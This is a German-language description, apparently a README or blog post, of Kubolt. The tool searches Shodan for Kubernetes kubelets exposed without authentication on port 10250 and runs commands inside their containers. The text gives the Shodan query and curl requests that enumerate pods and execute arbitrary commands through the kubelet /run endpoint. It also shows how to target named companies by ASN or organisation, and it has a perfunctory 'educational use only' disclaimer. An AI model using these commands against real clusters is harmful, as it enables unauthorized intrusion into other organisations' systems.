
Kubolt-Dienstprogramm zum Scannen öffentlicher Kubernetes-Cluster
Kubolt ist ein einfaches Dienstprogramm zum Scannen öffentlicher nicht authentifizierter Kubernetes-Cluster und zum Ausführen von Befehlen in Containern
Manchmal ist der Kubelet-Port 10250 für unbefugten Zugriff geöffnet und ermöglicht es, Befehle in den Containern mit der getrun-Funktion von kubelet auszuführen:
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
params := getExecRequestParams(request)
pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
if !ok {
response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
return
}
Okay, fragen wir unseren Freund Shodan :trollface:
Die grundlegende Abfrage lautet
ssl:true port:10250 404
Kubelet verwendet standardmäßig Port 10250 mit SSL, 404 ist die HTTP-Antwort ohne URL-Pfad.
Kubolt fragt Shodan per API nach einer Liste von IP-Adressen und behält sie für andere OSINT-Aktionen 😁
Zuerst fragen wir Kubelet nach laufenden Pods und filtern Hosts, bei denen die Antwort kein Unauthorized enthält und container enthält, damit wir darin einen Befehl ausführen können.
curl -k https://IP-from-Shodan:10250/runningpods/
Wenn Sie den Host ohne laufende Pods finden, behalten Sie ihn für das nächste Mal, wenn Pods gestartet werden könnten 😁
Sie können alle verfügbaren Pods aus diesen Anfragen auflisten:
curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/
Als nächstes parst kubolt die Antwort und generiert eine neue Anfrage wie unten:
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>"
Sie können Unternehmen gezielter ansprechen, indem Sie Shodan-Filter wie verwenden:
mkdir output
pip install -r requirements.txt
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or
python kubolt.py --query "org:'ACME Corporation' country:UK"
Kubolt verwendet die Shodan-API und Query Credits entsprechend. Wenn Sie das Tool ohne Abfragefilter ausführen, verbrauchen Sie wahrscheinlich alle Ihre Credits ¯\_(ツ)_/¯

Das vom Autor bereitgestellte Tool sollte nur zu Bildungszwecken verwendet werden. Der Autor kann nicht für den Missbrauch des Tools verantwortlich gemacht werden. Der Autor ist nicht verantwortlich für direkte oder indirekte Schäden, die durch die Nutzung des Tools entstehen.